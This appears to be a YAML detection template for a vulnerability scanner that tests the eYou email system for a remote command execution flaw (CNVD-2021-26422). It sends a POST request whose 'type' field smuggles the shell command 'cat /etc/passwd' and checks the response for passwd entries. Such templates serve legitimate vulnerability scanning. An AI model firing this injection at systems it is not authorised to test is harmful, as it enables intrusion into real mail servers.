id: eyou-mail-moni-detail-rce

info:
  name: 亿邮电子邮件系统 moni_detail.do 远程命令执行漏洞
  author: zan8in
  severity: critical
  description: |
    亿邮电子邮件系统 存在远程命令执行漏洞，攻击者可以执行任意命令
    body="亿邮电子邮件系统"
  reference:
    - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py
    - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md
  tags: eyoumail,rce,cnvd,cnvd2021

rules:
  r0:
    request:
      method: POST
      path: /webadm/?q=moni_detail.do&action=gragh
      body: |
        type='|cat /etc/passwd||'
    expression: response.status == 200 &&  "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
